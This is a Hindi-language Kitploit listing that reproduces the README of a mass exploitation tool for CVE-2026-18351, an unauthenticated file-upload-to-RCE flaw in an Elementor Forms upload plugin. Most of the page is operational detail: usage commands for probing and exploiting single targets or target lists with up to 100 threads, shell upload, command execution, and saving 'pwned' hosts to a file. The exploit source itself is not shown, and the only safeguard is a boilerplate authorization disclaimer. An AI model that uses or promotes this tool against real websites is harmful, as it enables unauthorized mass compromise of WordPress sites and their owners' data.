Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-18351 — CVE-2026-18351 के लिए मास एक्सप्लॉइट टूल, जो Elementor Forms <= 1.6.0 में अनऑथेंटिकेटेड आर्बिट्ररी फ़ाइल अपलोड से RCE तक का फ़ायदा उठाता है, जिसमें पैसिव प्रोबिंग, शेल अपलोड और कमांड एक्ज़ीक्यूशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
भेद्यता स्कैनरशोषणस्क्रिप्टिंग और स्वचालनवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHub
johenlastgen-jlg/cve-2026-18351

CVE-2026-18351

CVE-2026-18351 के लिए मास एक्सप्लॉइट टूल, जो Elementor Forms <= 1.6.0 में अनऑथेंटिकेटेड आर्बिट्ररी फ़ाइल अपलोड से RCE तक का फ़ायदा उठाता है, जिसमें पैसिव प्रोबिंग, शेल अपलोड और कमांड एक्ज़ीक्यूशन शामिल है।

रिपॉजिटरी देखें
16घं 29मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-18351

CVE-2026-18351 के लिए मास एक्सप्लॉइट टूल — Drag and Drop File Upload for Elementor Forms <= 1.6.0 में अनऑथेंटिकेटेड आर्बिट्ररी फ़ाइल अपलोड → RCE।

श्रेय johenlastgen | telegram @johenlastgen | चैनल @jlgnetworkredirect


विशेषताएँ

  • पैसिव वल्नरेबिलिटी प्रोब (कोई अपलोड नहीं)
  • शेल अपलोड और RCE पुष्टि के साथ पूर्ण एक्सप्लॉइट मोड
  • सिंगल टारगेट और बैच टारगेट समर्थन
  • मल्टी-थ्रेड समर्थन
  • कॉन्फ़िगर करने योग्य कमांड निष्पादन
  • पूर्ण लॉग, केवल-वल्नर और केवल-प्वाउंड आउटपुट फ़ाइलें
  • रिक्वेस्ट टाइमआउट कॉन्फ़िगरेशन

आवश्यकताएँ

कोई बाहरी निर्भरता नहीं — केवल Python मानक लाइब्रेरी का उपयोग करता है।

root@kitploit:~
python3 --version  # 3.6+

उपयोग

root@kitploit:~
# Single target — passive check only (no upload)
python3 mass.py --url http://target.com --check

# Single target — exploit with default command (id)
python3 mass.py --url http://target.com --cmd id

# Single target — exploit with custom command
python3 mass.py --url http://target.com --cmd whoami

# Mass targets — passive check
python3 mass.py --list targets.txt --threads 50 --check

# Mass targets — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id

# Mass targets — exploit with timeout tuning
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# Save full log
python3 mass.py --list targets.txt --output results.txt

# Save only vulnerable targets
python3 mass.py --list targets.txt --output-vuln vuln.txt

# Save only confirmed RCE targets
python3 mass.py --list targets.txt --output-pwned pwned.txt

# Combined output
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

विकल्प

विकल्पविवरण
--urlएकल टारगेट URL
--list FILEटारगेट URL वाली फ़ाइल (प्रति पंक्ति एक)
--checkकेवल पैसिव प्रोब — कोई फ़ाइल अपलोड नहीं
--cmd CMDशेल पर निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)
--threads Nसमवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 20)
--timeout Nप्रति-रिक्वेस्ट टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
--output FILEपूर्ण लॉग फ़ाइल में सहेजें
--output-vuln FILEकेवल वल्नरेबल टारगेट URL फ़ाइल में सहेजें
--output-pwned FILEकेवल पुष्ट RCE टारगेट फ़ाइल में सहेजें

आउटपुट स्थितियाँ

स्थितिअर्थ
PWNEDशेल अपलोड हुआ और RCE की पुष्टि हुई
VULN-NO-EXECअपलोड स्वीकृत लेकिन शेल निष्पादन विफल
PATCHEDअपलोड अस्वीकृत या nonce नहीं मिला
ERRORनेटवर्क या पार्स विफलता

targets.txt प्रारूप

प्रति पंक्ति एक URL। # से शुरू होने वाली पंक्तियाँ अनदेखी की जाती हैं।

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

अस्वीकरण

यह प्रोजेक्ट केवल अधिकृत सुरक्षा आकलन, रक्षात्मक सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए प्रदान किया गया है।

इस सॉफ़्टवेयर का उपयोग करके, आप पुष्टि करते हैं कि आपके पास लक्ष्य प्रणालियों का आकलन करने के लिए स्पष्ट प्राधिकरण है। कंप्यूटर प्रणालियों तक अनधिकृत पहुँच निषिद्ध है और लागू कानूनों का उल्लंघन कर सकती है।

लेखक और योगदानकर्ता इस प्रोजेक्ट के अनधिकृत उपयोग को प्रोत्साहित या समर्थन नहीं करते हैं और इसके उपयोग से होने वाले किसी भी दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई ज़िम्मेदारी या दायित्व स्वीकार नहीं करते हैं।


लेखक

JohenLastGen — JLG NETWORK

टूल डाउनलोड करें